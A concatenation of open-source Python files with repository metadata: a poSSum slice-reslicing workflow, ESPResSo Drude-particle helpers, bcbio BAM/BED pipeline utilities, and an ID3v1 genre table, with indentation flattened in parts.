ip = x(ref_coord)
# 'left' slice: slice_idx
# 'right' slice: slice_idx + 1
l_slice = int(ip)
r_slice = int(ip) + 1
r_weight = ip - int(ip)
l_weight = 1 - r_weight
# Avoid getting out of the range:
if r_slice > len(coords_from)-1:
r_slice = l_slice
# print i, l_slice, l_weight, r_slice, r_weight, len(coords_from)
slice_results = {'status': True, 'coord': i,
'slice_1': l_slice, 'weight_1': l_weight,
'slice_2': r_slice, 'weight_2': r_weight}
results.append(slice_results)
            except ValueError:
                # The probing coordinate falls outside the reference range;
                # interp1d raises ValueError, so mark the slice as missing.
                slice_results = {'status': False, 'coord': i,
                                 'slice_1': self.CONST_NOSLICE_INDEX, 'weight_1': 1.0,
                                 'slice_2': self.CONST_NOSLICE_INDEX, 'weight_2': 1.0}
                results.append(slice_results)
return results
def prepare_output_grayscale_volume(self):
stack_grayscale = pos_wrappers.stack_slices_gray_wrapper(
temp_volume_fn = self.f['tmp_gray_vol'](),
stack_mask = self.f['weighted_grayscale_mask'](),
permutation_order = self.options.output_volume_permute_axes,
orientation_code = self.options.output_volume_orientation,
output_type = self.options.output_volume_scalar_type,
spacing = self.options.output_volume_spacing,
origin = self.options.output_volume_origin,
            interpolation = self.options.output_volume_interpolation,
resample = self.options.output_volume_resample,
output_volume_fn = self.f['output_volumes']())
self.execute_callable(stack_grayscale)
def prepare_output_multichannel_volume(self):
stack_multichannel = pos_wrappers.stack_slices_rgb_wrapper(
stack_mask = self.f['weighted_multichannel_mask'](),
slice_start= 0,
slice_end = len(self.coords_to)-1,
temp_volume_fn = self.f['tmp_gray_vol'](),
permutation_order = self.options.output_volume_permute_axes,
orientation_code = self.options.output_volume_orientation,
output_type = self.options.output_volume_scalar_type,
spacing = self.options.output_volume_spacing,
origin = self.options.output_volume_origin,
            interpolation = self.options.output_volume_interpolation,
resample = self.options.output_volume_resample,
output_volume_fn = self.f['output_volumes']())
self.execute_callable(stack_multichannel)
# TODO: Rethink this in general.
# perhaps you want to have a module which
# simply puts section in a canvas?
@classmethod
def _getCommandLineParser(cls):
parser = generic_workflow._getCommandLineParser()
regSettings = \
OptionGroup(parser, 'Processing settings.')
regSettings.add_option('--referenceCoordinates', default=None,
type='str', dest='referenceCoordinates',
help='File with reference coordinates (the experimental one).')
regSettings.add_option('--negateReferenceCoordinates', default=False,
dest='negateReferenceCoordinates', action='store_const', const=True,
help="Negate values of the reference coordinates.")
regSettings.add_option('--probingCoordinates', default=None,
type='str', dest='probingCoordinates',
help='File with probing coordinates (the atlas one).')
regSettings.add_option('--negateProbingCoordinates', default=False,
dest='negateProbingCoordinates', action='store_const', const=True,
help="Negate values of the probing coordinates.")
regSettings.add_option('--interpolation', default='nearest', type='str',
dest='interpolation', help='Slice interpolation method <nearest|linear>')
regSettings.add_option('--referenceInputDirectory', default=None,
type='str', dest='referenceInputDirectory',
help='Input directory for reference slices (experimental slices).')
regSettings.add_option('--outputWeightedSlicesDir', default=None,
type='str', dest='outputWeightedSlicesDir',
help='Output directory for the weighted slices.')
regSettings.add_option('--useMultichannelWorkflow', default=False,
dest='useMultichannelWorkflow', action='store_const', const=True,
help="Use multichannel processing workflow.")
regSettings.add_option('--useGrayscaleWorkflow', default=False,
dest='useGrayscaleWorkflow', action='store_const', const=True,
help="Use grayscale processing workflow.")
        regSettings.add_option('--skipOutputVolumeGeneration', default=False,
            dest='skipOutputVolumeGeneration', action='store_const', const=True,
            help='Skip the output volume generation step.')
regSettings.add_option('--startingSliceIndexOffset', default=0, type="int",
dest='startingSliceIndexOffset', action='store',
help='Indicates index of the first image.')
outputVolumeSettings = \
OptionGroup(parser, 'OutputVolumeSettings.')
outputVolumeSettings.add_option('--output-volume-origin', dest='output_volume_origin',
default=[0.,0.,0.], action='store', type='float', nargs =3, help='')
outputVolumeSettings.add_option('--output-volume-scalar-type', default='uchar',
type='str', dest='output_volume_scalar_type',
help='Data type for output volume\'s voxels. Allowed values: char | uchar | short | ushort | int | uint | float | double')
outputVolumeSettings.add_option('--output-volume-spacing', default=[1,1,1],
type='float', nargs=3, dest='output_volume_spacing',
help='Spacing of the output volume in mm (both grayscale and color volume).')
outputVolumeSettings.add_option('--output-volume-resample',
dest='output_volume_resample', type='float', nargs=3, default=None,
help='Apply additional resampling to the volume')
outputVolumeSettings.add_option('--output-volume-permute-axes', default=[0,1,2],
type='int', nargs=3, dest='output_volume_permute_axes',
help='Apply axes permutation. Permutation has to be provided as sequence of 3 integers separated by space. Identity (0,1,2) permutation is a default one.')
outputVolumeSettings.add_option('--output-volume-orientation', dest='output_volume_orientation', type='str',
default='RAS', help='')
outputVolumeSettings.add_option('--grayscale-volume-filename', dest='grayscaleVolumeFilename',
type='str', default=None)
outputVolumeSettings.add_option('--rgbVolumeFilename', dest='rgbVolumeFilename',
type='str', default=None)
outputVolumeSettings.add_option('--output-volume-interpolation',
dest='output_volume_interpolation', type='str', default=None,
help='<NearestNeighbor|Linear|Cubic|Sinc|Gaussian>')
parser.add_option_group(regSettings)
parser.add_option_group(outputVolumeSettings)
return parser
if __name__ == '__main__':
    options, args = nonuniform_reslice.parseArgs()
    d = nonuniform_reslice(options, args)
d.launch()
|
pmajka/poSSum
|
possum/nonuniform_reslice.py
|
Python
|
mit
| 16,642
|
[
"Gaussian",
"VTK"
] |
e7a1ad9762b6b0bee7a2e12223723045b08955a221dbdece34c1a3e36c812558
|
# Copyright (C) 2010-2018 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import espressomd.interactions
from espressomd import has_features
# Dict with Drude type infos
drude_dict = {}
# Lists with unique Drude and core types
core_type_list = []
drude_type_list = []
# Get core id from Drude id
core_id_from_drude_id = {}
# Drude IDs
drude_id_list = []
def add_drude_particle_to_core(system, harmonic_bond, thermalized_bond,
p_core, id_drude, type_drude, alpha,
mass_drude, coulomb_prefactor,
thole_damping=2.6, verbose=False):
"""
Adds a Drude particle with specified id, type, and mass to the system.
Checks if different Drude particles have different types.
Collects types/charges/polarizations/Thole factors for intramol. core-Drude short-range exclusion and Thole interaction.
    Parameters
    ----------
system : Instance of :attr:`espressomd.system.System`
    harmonic_bond: This method adds this harmonic bond between the Drude particle and the core
    thermalized_bond: This method adds this thermalized bond between the Drude particle and the core
    p_core: The existing core particle
id_drude: :obj:`int`
This method creates the Drude particle and assigns this id.
type_drude: :obj:`int`
The type of the newly created Drude particle
alpha : :obj:`float`
The polarizability in units of inverse volume. Related to the charge of the Drude particle.
mass_drude : :obj:`float`
The mass of the newly created Drude particle
coulomb_prefactor : :obj:`float`
Required to calculate the charge of the Drude particle.
thole_damping : :obj:`float`
Thole damping factor of the Drude pair. Comes to effect if add_all_thole() method is used.
verbose : :obj:`bool`
Turns on verbosity.
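    The Drude charge follows from the harmonic force constant and the
    polarizability as ``q_drude = -sqrt(k * alpha / coulomb_prefactor)``
    (see the first lines of the implementation below). For example,
    ``k = 100``, ``alpha = 1.0`` and ``coulomb_prefactor = 1.0`` give
    ``q_drude = -10.0``.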
"""
k = harmonic_bond.params["k"]
q_drude = -1.0 * pow(k * alpha / coulomb_prefactor, 0.5)
if has_features("PARTICLE_ANISOTROPY"):
gamma_off = [0.0, 0.0, 0.0]
else:
gamma_off = 0.0
system.part.add(id=id_drude, pos=p_core.pos, type=type_drude,
q=q_drude, mass=mass_drude, temp=0, gamma=gamma_off)
if verbose:
print(
"Adding to core", p_core.id, "drude id", id_drude, " pol", alpha,
" core charge", p_core.q, "->", p_core.q - q_drude, " drude charge", q_drude)
p_core.q -= q_drude
p_core.mass -= mass_drude
p_core.add_bond((harmonic_bond, id_drude))
p_core.add_bond((thermalized_bond, id_drude))
p_core.temp = 0.0
p_core.gamma = gamma_off
if type_drude in drude_dict and not (drude_dict[type_drude]["q"] == q_drude and drude_dict[type_drude]["thole_damping"] == thole_damping):
raise Exception(
"Drude particles with different drude charges have to have different types for THOLE")
core_id_from_drude_id[id_drude] = p_core.id
# Add new Thole nonbonded interaction for D-D, D-C, C-C for all existing
# Drude types if this type is seen for the first time
    if type_drude not in drude_dict:
# Bookkeeping of q, alphas and damping parameter
drude_dict[type_drude] = {}
drude_dict[type_drude]["q"] = q_drude
drude_dict[type_drude]["qc"] = p_core.q
drude_dict[type_drude]["alpha"] = alpha
drude_dict[type_drude]["thole_damping"] = thole_damping
drude_dict[type_drude]["core_type"] = p_core.type
# Save same information to get access to the parameters via core types
drude_dict[p_core.type] = {}
drude_dict[p_core.type]["q"] = -q_drude
drude_dict[p_core.type]["qc"] = p_core.q
drude_dict[p_core.type]["alpha"] = alpha
drude_dict[p_core.type]["thole_damping"] = thole_damping
drude_dict[p_core.type]["drude_type"] = type_drude
    # Collect unique Drude types
    if type_drude not in drude_type_list:
        drude_type_list.append(type_drude)
    # Collect unique core types
    if p_core.type not in core_type_list:
        core_type_list.append(p_core.type)
    # Collect unique Drude ids
    if id_drude not in drude_id_list:
        drude_id_list.append(id_drude)
def add_thole_pair_damping(system, t1, t2, verbose=False):
"""
Calculates mixed Thole factors depending on Thole damping and polarization.
Adds non-bonded Thole interactions to the system.
    Parameters
    ----------
system : Instance of :attr:`espressomd.system.System`
t1 : :obj:`int`
Type 1
t2 : :obj:`int`
Type 2
verbose : :obj:`bool`
Turns on verbosity.
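    The mixed damping coefficient implemented below is
    ``s = 0.5 * (s1 + s2) / (alpha1 * alpha2)**(1.0 / 6.0)``, i.e. the
    arithmetic mean of the two Thole damping factors divided by the sixth
    root of the product of the two polarizabilities; the charge product
    ``q1q2`` is taken between the two Drude charges.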
"""
qq = drude_dict[t1]["q"] * drude_dict[t2]["q"]
s = 0.5 * (drude_dict[t1]["thole_damping"] + drude_dict[t2]["thole_damping"]
) / (drude_dict[t1]["alpha"] * drude_dict[t2]["alpha"])**(1.0 / 6.0)
system.non_bonded_inter[t1, t2].thole.set_params(scaling_coeff=s, q1q2=qq)
if verbose:
print("Added THOLE non-bonded interaction for types",
t1, "<->", t2, "S", s, "q1q2", qq)
def add_all_thole(system, verbose=False):
"""
Calls add_thole_pair_damping() for all necessary combinations to create the interactions.
    Parameters
    ----------
system : Instance of :attr:`espressomd.system.System`
verbose : :obj:`bool`
Turns on verbosity.
"""
# Drude <-> Drude
for i in range(len(drude_type_list)):
for j in range(i, len(drude_type_list)):
add_thole_pair_damping(
system, drude_type_list[i], drude_type_list[j], verbose)
# core <-> core
for i in range(len(core_type_list)):
for j in range(i, len(core_type_list)):
add_thole_pair_damping(
system, core_type_list[i], core_type_list[j], verbose)
# Drude <-> core
for i in drude_type_list:
for j in core_type_list:
add_thole_pair_damping(system, i, j, verbose)
def setup_and_add_drude_exclusion_bonds(system, verbose=False):
"""
Creates electrostatic short-range exclusion bonds for global exclusion
between Drude particles and core charges and adds the bonds to the cores.
Has to be called once after all Drude particles have been created.
    Parameters
    ----------
    system : Instance of :attr:`espressomd.system.System`
    verbose : :obj:`bool`
Turns on verbosity.
"""
# All Drude types need...
for td in drude_type_list:
#...exclusions with core
qd = drude_dict[td]["q"] # Drude charge
qc = drude_dict[td]["qc"] # Core charge
subtr_sr_bond = espressomd.interactions.BondedCoulombSRBond(
q1q2=-qd * qc)
system.bonded_inter.add(subtr_sr_bond)
drude_dict[td]["subtr_sr_bonds_drude-core"] = subtr_sr_bond
if verbose:
print("Added drude-core SR exclusion bond ",
subtr_sr_bond, "for drude", qd, "<-> core", qc, "to system")
for drude_id in drude_id_list:
core_id = core_id_from_drude_id[drude_id]
pd = system.part[drude_id]
pc = system.part[core_id]
bond = drude_dict[pd.type]["subtr_sr_bonds_drude-core"]
pc.add_bond((bond, drude_id))
if verbose:
print("Added drude-core SR bond", bond,
"between ids", drude_id, "and", core_id)
def setup_intramol_exclusion_bonds(system, mol_drude_types, mol_core_types,
mol_core_partial_charges, verbose=False):
"""
Creates electrostatic short-range exclusion bonds for intramolecular exclusion
between Drude particles and partial charges of the cores. Has to be called once
after all Drude particles have been created.
    Parameters
----------
system : Instance of :attr:`espressomd.system.System`
mol_drude_types : List of types of Drude particles within the molecule
mol_core_types : List of types of core particles within the molecule
mol_core_partial_charges : List of partial charges of core particles within the molecule
verbose : :obj:`bool`
Turns on verbosity.
"""
# All Drude types need...
for td in mol_drude_types:
drude_dict[td]["subtr_sr_bonds_intramol"] = {}
#... sr exclusion bond with other partial core charges...
for tc, qp in zip(mol_core_types, mol_core_partial_charges):
#...excluding the Drude core partner
if drude_dict[td]["core_type"] != tc:
qd = drude_dict[td]["q"] # Drude charge
subtr_sr_bond = espressomd.interactions.BondedCoulombSRBond(
q1q2=-qd * qp)
system.bonded_inter.add(subtr_sr_bond)
drude_dict[td]["subtr_sr_bonds_intramol"][
tc] = subtr_sr_bond
if verbose:
print("Added intramolecular exclusion", subtr_sr_bond,
"for drude", qd, "<-> core", qp, "to system")
def add_intramol_exclusion_bonds(system, drude_ids, core_ids, verbose=False):
"""
Applies electrostatic short-range exclusion bonds for the given ids.
Has to be applied for all molecules.
    Parameters
----------
system : Instance of :attr:`espressomd.system.System`
drude_ids : IDs of Drude particles within a molecule.
core_ids : IDs of core particles within a molecule.
verbose : :obj:`bool`
Turns on verbosity.
"""
for drude_id in drude_ids:
for core_id in core_ids:
if core_id_from_drude_id[drude_id] != core_id:
pd = system.part[drude_id]
pc = system.part[core_id]
bond = drude_dict[pd.type][
"subtr_sr_bonds_intramol"][pc.type]
pd.add_bond((bond, core_id))
if verbose:
print("Added subtr_sr bond", bond,
"between ids", drude_id, "and", core_id)
|
mkuron/espresso
|
src/python/espressomd/drude_helpers.py
|
Python
|
gpl-3.0
| 10,675
|
[
"ESPResSo"
] |
74011832dfce3aabcca09d85b3c70211f0a78dc804f0ee561fc1ff54883e45e6
|
"""Pipeline functionality shared amongst multiple analysis types.
"""
import os
from contextlib import closing, contextmanager
import functools
import tempfile
import pysam
from bcbio import bam, broad, utils
from bcbio.pipeline import config_utils
from bcbio.utils import file_exists, safe_makedir, save_diskspace
from bcbio.distributed.transaction import file_transaction, tx_tmpdir
from bcbio.provenance import do
# ## Split/Combine helpers
def combine_bam(in_files, out_file, config):
"""Parallel target to combine multiple BAM files.
"""
runner = broad.runner_from_config(config)
runner.run_fn("picard_merge", in_files, out_file)
for in_file in in_files:
save_diskspace(in_file, "Merged into {0}".format(out_file), config)
bam.index(out_file, config)
return out_file
def process_bam_by_chromosome(output_ext, file_key, default_targets=None, dir_ext_fn=None):
"""Provide targets to process a BAM file by individual chromosome regions.
output_ext: extension to supply to output files
file_key: the key of the BAM file in the input data map
default_targets: a list of extra chromosome targets to process, beyond those specified
in the BAM file. Useful for retrieval of non-mapped reads.
dir_ext_fn: A function to retrieve a directory naming extension from input data map.
"""
if default_targets is None:
default_targets = []
def _do_work(data):
bam_file = data[file_key]
out_dir = os.path.dirname(bam_file)
if dir_ext_fn:
out_dir = os.path.join(out_dir, dir_ext_fn(data))
out_file = os.path.join(out_dir, "{base}{ext}".format(
base=os.path.splitext(os.path.basename(bam_file))[0],
ext=output_ext))
part_info = []
if not file_exists(out_file):
work_dir = safe_makedir(
"{base}-split".format(base=os.path.splitext(out_file)[0]))
with closing(pysam.Samfile(bam_file, "rb")) as work_bam:
for chr_ref in list(work_bam.references) + default_targets:
chr_out = os.path.join(work_dir,
"{base}-{ref}{ext}".format(
base=os.path.splitext(os.path.basename(bam_file))[0],
ref=chr_ref, ext=output_ext))
part_info.append((chr_ref, chr_out))
return out_file, part_info
return _do_work
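# Editor's usage sketch (hypothetical keys and paths): build the splitter once,
# then apply it to a sample's data dictionary.
#   split_fn = process_bam_by_chromosome(".vcf", "work_bam")
#   out_file, part_info = split_fn({"work_bam": "/path/sample.bam"})
# part_info is a list of (chromosome, per-chromosome output path) tuples.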
def write_nochr_reads(in_file, out_file, config):
"""Write a BAM file of reads that are not mapped on a reference chromosome.
This is useful for maintaining non-mapped reads in parallel processes
that split processing by chromosome.
"""
if not file_exists(out_file):
with file_transaction(config, out_file) as tx_out_file:
samtools = config_utils.get_program("samtools", config)
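            # SAM flag 4 marks a read as unmapped; "-f 4" keeps only those reads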
cmd = "{samtools} view -b -f 4 {in_file} > {tx_out_file}"
do.run(cmd.format(**locals()), "Select unmapped reads")
return out_file
def write_noanalysis_reads(in_file, region_file, out_file, config):
"""Write a BAM file of reads in the specified region file that are not analyzed.
We want to get only reads not in analysis regions but also make use of
the BAM index to perform well on large files. The tricky part is avoiding
command line limits. There is a nice discussion on SeqAnswers:
http://seqanswers.com/forums/showthread.php?t=29538
    sambamba supports intersection via an input BED file, which avoids command
    line length issues.
"""
if not file_exists(out_file):
with file_transaction(config, out_file) as tx_out_file:
bedtools = config_utils.get_program("bedtools", config)
sambamba = config_utils.get_program("sambamba", config)
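            # sambamba pre-filters reads overlapping the BED via the BAM index;
            # bedtools "-f 1.0" then keeps only reads fully inside a region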
cl = ("{sambamba} view -f bam -L {region_file} {in_file} | "
"{bedtools} intersect -abam - -b {region_file} -f 1.0 "
"> {tx_out_file}")
do.run(cl.format(**locals()), "Select unanalyzed reads")
return out_file
def subset_bam_by_region(in_file, region, config, out_file_base=None):
"""Subset BAM files based on specified chromosome region.
"""
if out_file_base is not None:
base, ext = os.path.splitext(out_file_base)
else:
base, ext = os.path.splitext(in_file)
out_file = "%s-subset%s%s" % (base, region, ext)
if not file_exists(out_file):
with closing(pysam.Samfile(in_file, "rb")) as in_bam:
target_tid = in_bam.gettid(region)
            assert target_tid is not None and target_tid >= 0, \
                "Did not find reference region %s in %s" % \
                (region, in_file)
with file_transaction(config, out_file) as tx_out_file:
with closing(pysam.Samfile(tx_out_file, "wb", template=in_bam)) as out_bam:
for read in in_bam:
if read.tid == target_tid:
out_bam.write(read)
return out_file
def _rewrite_bed_with_chrom(in_file, out_file, chrom):
with open(in_file) as in_handle:
with open(out_file, "w") as out_handle:
for line in in_handle:
if line.startswith("%s\t" % chrom):
out_handle.write(line)
def _subset_bed_by_region(in_file, out_file, region, do_merge=True):
import pybedtools
orig_bed = pybedtools.BedTool(in_file)
region_bed = pybedtools.BedTool("\t".join(str(x) for x in region) + "\n", from_string=True)
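    # drop intersection slivers of 5 bp or less before writing the subset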
if do_merge:
orig_bed.intersect(region_bed).filter(lambda x: len(x) > 5).merge().saveas(out_file)
else:
orig_bed.intersect(region_bed).filter(lambda x: len(x) > 5).saveas(out_file)
def get_lcr_bed(items):
lcr_bed = utils.get_in(items[0], ("genome_resources", "variation", "lcr"))
do_lcr = any([utils.get_in(data, ("config", "algorithm", "remove_lcr"), False)
for data in items])
if do_lcr and lcr_bed and os.path.exists(lcr_bed):
return lcr_bed
def remove_lcr_regions(orig_bed, items):
"""If configured and available, update a BED file to remove low complexity regions.
"""
import pybedtools
lcr_bed = get_lcr_bed(items)
if lcr_bed:
        nolcr_bed = "%s-nolcr.bed" % utils.splitext_plus(orig_bed)[0]
with file_transaction(items[0], nolcr_bed) as tx_nolcr_bed:
pybedtools.BedTool(orig_bed).subtract(pybedtools.BedTool(lcr_bed)).saveas(tx_nolcr_bed)
# If we have a non-empty file, convert to the LCR subtracted for downstream analysis
if utils.file_exists(nolcr_bed):
orig_bed = nolcr_bed
return orig_bed
@contextmanager
def bedtools_tmpdir(data):
import pybedtools
with tx_tmpdir(data) as tmpdir:
orig_tmpdir = tempfile.gettempdir()
pybedtools.set_tempdir(tmpdir)
yield
if orig_tmpdir and os.path.exists(orig_tmpdir):
pybedtools.set_tempdir(orig_tmpdir)
else:
tempfile.tempdir = None
def subtract_low_complexity(f):
"""Remove low complexity regions from callable regions if available.
"""
@functools.wraps(f)
def wrapper(variant_regions, region, out_file, items=None, do_merge=True):
region_bed = f(variant_regions, region, out_file, items, do_merge)
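        # basestring is Python 2-only; the isinstance check skips pass-through
        # region values (tuples or None) so only real BED paths get filtered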
if region_bed and isinstance(region_bed, basestring) and os.path.exists(region_bed) and items:
region_bed = remove_lcr_regions(region_bed, items)
return region_bed
return wrapper
@subtract_low_complexity
def subset_variant_regions(variant_regions, region, out_file, items=None, do_merge=True):
"""Return BED file subset by a specified chromosome region.
variant_regions is a BED file, region is a chromosome name or tuple
of (name, start, end) for a genomic region.
"""
if region is None:
return variant_regions
elif variant_regions is None:
return region
elif not isinstance(region, (list, tuple)) and region.find(":") > 0:
raise ValueError("Partial chromosome regions not supported")
else:
merge_text = "-unmerged" if not do_merge else ""
subset_file = "{0}".format(utils.splitext_plus(out_file)[0])
subset_file += "%s-regions.bed" % (merge_text)
if not os.path.exists(subset_file):
with file_transaction(items[0] if items else None, subset_file) as tx_subset_file:
if isinstance(region, (list, tuple)):
                    _subset_bed_by_region(variant_regions, tx_subset_file, region, do_merge=do_merge)
else:
_rewrite_bed_with_chrom(variant_regions, tx_subset_file, region)
if os.path.getsize(subset_file) == 0:
return region
else:
return subset_file
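# Editor's usage sketch (hypothetical paths): subset a variant BED down to one
# chromosome; an empty subset falls back to returning the region itself.
#   subset_variant_regions("/path/variants.bed", "chr20", "/path/out.vcf")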
|
SciLifeLab/bcbio-nextgen
|
bcbio/pipeline/shared.py
|
Python
|
mit
| 8,867
|
[
"pysam"
] |
51e7cf5210841458e8ff822c55fec4216763109d756edc7995db2ace5a797329
|
# coding=utf-8
__author__ = "Peter Klassen peter@mediadock.org"
__license__ = "MIT License"
__copyright__ = "(c) 2019 Peter Klassen peter@mediadock.org"
# versions
ID3v1_VERSION = 'ID3v1'
ID3v1_1_VERSION = 'ID3v1.1'
ID3v2_2_VERSION = 'ID3v2.2'
ID3v2_3_VERSION = 'ID3v2.3'
ID3v2_4_VERSION = 'ID3v2.4'
# ID3v1 genres
class ID3v1_GENRES(object):
GENRE_2_NAME = dict()
BLUES = 0
BLUES_NAME = 'Blues'
GENRE_2_NAME[BLUES] = BLUES_NAME
CLASSIC_ROCK = 1
CLASSIC_ROCK_NAME = 'Classic Rock'
GENRE_2_NAME[CLASSIC_ROCK] = CLASSIC_ROCK_NAME
    COUNTRY = 2
    COUNTRY_NAME = 'Country'
    GENRE_2_NAME[COUNTRY] = COUNTRY_NAME
DANCE = 3
DANCE_NAME = 'Dance'
GENRE_2_NAME[DANCE] = DANCE_NAME
DISCO = 4
DISCO_NAME = 'Disco'
GENRE_2_NAME[DISCO] = DISCO_NAME
FUNK = 5
FUNK_NAME = 'Funk'
GENRE_2_NAME[FUNK] = FUNK_NAME
GRUNGE = 6
GRUNGE_NAME = 'Grunge'
GENRE_2_NAME[GRUNGE] = GRUNGE_NAME
HIP_HOP = 7
HIP_HOP_NAME = 'Hip-Hop'
GENRE_2_NAME[HIP_HOP] = HIP_HOP_NAME
JAZZ = 8
JAZZ_NAME = 'Jazz'
GENRE_2_NAME[JAZZ] = JAZZ_NAME
METAL = 9
METAL_NAME = 'Metal'
GENRE_2_NAME[METAL] = METAL_NAME
NEW_AGE = 10
NEW_AGE_NAME = 'New Age'
GENRE_2_NAME[NEW_AGE] = NEW_AGE_NAME
OLDIES = 11
OLDIES_NAME = 'Oldies'
GENRE_2_NAME[OLDIES] = OLDIES_NAME
OTHER = 12
OTHER_NAME = 'Other'
GENRE_2_NAME[OTHER] = OTHER_NAME
POP = 13
POP_NAME = 'Pop'
GENRE_2_NAME[POP] = POP_NAME
R_B = 14
R_B_NAME = 'R&B'
GENRE_2_NAME[R_B] = R_B_NAME
RAP = 15
RAP_NAME = 'Rap'
GENRE_2_NAME[RAP] = RAP_NAME
REGGAE = 16
REGGAE_NAME = 'Reggae'
GENRE_2_NAME[REGGAE] = REGGAE_NAME
ROCK = 17
ROCK_NAME = 'Rock'
GENRE_2_NAME[ROCK] = ROCK_NAME
TECHNO = 18
TECHNO_NAME = 'Techno'
GENRE_2_NAME[TECHNO] = TECHNO_NAME
INDUSTRIAL = 19
INDUSTRIAL_NAME = 'Industrial'
GENRE_2_NAME[INDUSTRIAL] = INDUSTRIAL_NAME
ALTERNATIVE = 20
ALTERNATIVE_NAME = 'Alternative'
GENRE_2_NAME[ALTERNATIVE] = ALTERNATIVE_NAME
SKA = 21
SKA_NAME = 'Ska'
GENRE_2_NAME[SKA] = SKA_NAME
DEATH_METAL = 22
DEATH_METAL_NAME = 'Death Metal'
GENRE_2_NAME[DEATH_METAL] = DEATH_METAL_NAME
PRANKS = 23
PRANKS_NAME = 'Pranks'
GENRE_2_NAME[PRANKS] = PRANKS_NAME
SOUNDTRACK = 24
SOUNDTRACK_NAME = 'Soundtrack'
GENRE_2_NAME[SOUNDTRACK] = SOUNDTRACK_NAME
EURO_TECHNO = 25
EURO_TECHNO_NAME = 'Euro-Techno'
GENRE_2_NAME[EURO_TECHNO] = EURO_TECHNO_NAME
AMBIENT = 26
AMBIENT_NAME = 'Ambient'
GENRE_2_NAME[AMBIENT] = AMBIENT_NAME
TRIP_HOP = 27
TRIP_HOP_NAME = 'Trip-Hop'
GENRE_2_NAME[TRIP_HOP] = TRIP_HOP_NAME
VOCAL = 28
VOCAL_NAME = 'Vocal'
GENRE_2_NAME[VOCAL] = VOCAL_NAME
JAZZ_FUNK = 29
JAZZ_FUNK_NAME = 'Jazz+Funk'
GENRE_2_NAME[JAZZ_FUNK] = JAZZ_FUNK_NAME
FUSION = 30
FUSION_NAME = 'Fusion'
GENRE_2_NAME[FUSION] = FUSION_NAME
TRANCE = 31
TRANCE_NAME = 'Trance'
GENRE_2_NAME[TRANCE] = TRANCE_NAME
    CLASSICAL = 32
    CLASSICAL_NAME = 'Classical'
    GENRE_2_NAME[CLASSICAL] = CLASSICAL_NAME
INSTRUMENTAL = 33
INSTRUMENTAL_NAME = 'Instrumental'
GENRE_2_NAME[INSTRUMENTAL] = INSTRUMENTAL_NAME
ACID = 34
ACID_NAME = 'Acid'
GENRE_2_NAME[ACID] = ACID_NAME
HOUSE = 35
HOUSE_NAME = 'House'
GENRE_2_NAME[HOUSE] = HOUSE_NAME
GAME = 36
GAME_NAME = 'Game'
GENRE_2_NAME[GAME] = GAME_NAME
SOUND_CLIP = 37
SOUND_CLIP_NAME = 'Sound Clip'
GENRE_2_NAME[SOUND_CLIP] = SOUND_CLIP_NAME
GOSPEL = 38
GOSPEL_NAME = 'Gospel'
GENRE_2_NAME[GOSPEL] = GOSPEL_NAME
NOISE = 39
NOISE_NAME = 'Noise'
GENRE_2_NAME[NOISE] = NOISE_NAME
ALTERNROCK = 40
ALTERNROCK_NAME = 'AlternRock'
GENRE_2_NAME[ALTERNROCK] = ALTERNROCK_NAME
BASS = 41
BASS_NAME = 'Bass'
GENRE_2_NAME[BASS] = BASS_NAME
SOUL = 42
SOUL_NAME = 'Soul'
GENRE_2_NAME[SOUL] = SOUL_NAME
PUNK = 43
PUNK_NAME = 'Punk'
GENRE_2_NAME[PUNK] = PUNK_NAME
SPACE = 44
SPACE_NAME = 'Space'
GENRE_2_NAME[SPACE] = SPACE_NAME
MEDITATIVE = 45
MEDITATIVE_NAME = 'Meditative'
GENRE_2_NAME[MEDITATIVE] = MEDITATIVE_NAME
INSTRUMENTAL_POP = 46
INSTRUMENTAL_POP_NAME = 'Instrumental Pop'
GENRE_2_NAME[INSTRUMENTAL_POP] = INSTRUMENTAL_POP_NAME
INSTRUMENTAL_ROCK = 47
INSTRUMENTAL_ROCK_NAME = 'Instrumental Rock'
GENRE_2_NAME[INSTRUMENTAL_ROCK] = INSTRUMENTAL_ROCK_NAME
ETHNIC = 48
ETHNIC_NAME = 'Ethnic'
GENRE_2_NAME[ETHNIC] = ETHNIC_NAME
GOTHIC = 49
GOTHIC_NAME = 'Gothic'
GENRE_2_NAME[GOTHIC] = GOTHIC_NAME
DARKWAVE = 50
DARKWAVE_NAME = 'Darkwave'
GENRE_2_NAME[DARKWAVE] = DARKWAVE_NAME
TECHNO_INDUSTRIAL = 51
TECHNO_INDUSTRIAL_NAME = 'Techno-Industrial'
GENRE_2_NAME[TECHNO_INDUSTRIAL] = TECHNO_INDUSTRIAL_NAME
ELECTRONIC = 52
ELECTRONIC_NAME = 'Electronic'
GENRE_2_NAME[ELECTRONIC] = ELECTRONIC_NAME
POP_FOLK = 53
POP_FOLK_NAME = 'Pop-Folk'
GENRE_2_NAME[POP_FOLK] = POP_FOLK_NAME
EURODANCE = 54
EURODANCE_NAME = 'Eurodance'
GENRE_2_NAME[EURODANCE] = EURODANCE_NAME
DREAM = 55
DREAM_NAME = 'Dream'
GENRE_2_NAME[DREAM] = DREAM_NAME
SOUTHERN_ROCK = 56
SOUTHERN_ROCK_NAME = 'Southern Rock'
GENRE_2_NAME[SOUTHERN_ROCK] = SOUTHERN_ROCK_NAME
COMEDY = 57
COMEDY_NAME = 'Comedy'
GENRE_2_NAME[COMEDY] = COMEDY_NAME
CULT = 58
CULT_NAME = 'Cult'
GENRE_2_NAME[CULT] = CULT_NAME
GANGSTA = 59
GANGSTA_NAME = 'Gangsta'
GENRE_2_NAME[GANGSTA] = GANGSTA_NAME
TOP_40 = 60
TOP_40_NAME = 'Top 40'
GENRE_2_NAME[TOP_40] = TOP_40_NAME
CHRISTIAN_RAP = 61
CHRISTIAN_RAP_NAME = 'Christian Rap'
GENRE_2_NAME[CHRISTIAN_RAP] = CHRISTIAN_RAP_NAME
POP_FUNK = 62
POP_FUNK_NAME = 'Pop/Funk'
GENRE_2_NAME[POP_FUNK] = POP_FUNK_NAME
JUNGLE = 63
JUNGLE_NAME = 'Jungle'
GENRE_2_NAME[JUNGLE] = JUNGLE_NAME
NATIVE_AMERICAN = 64
NATIVE_AMERICAN_NAME = 'Native American'
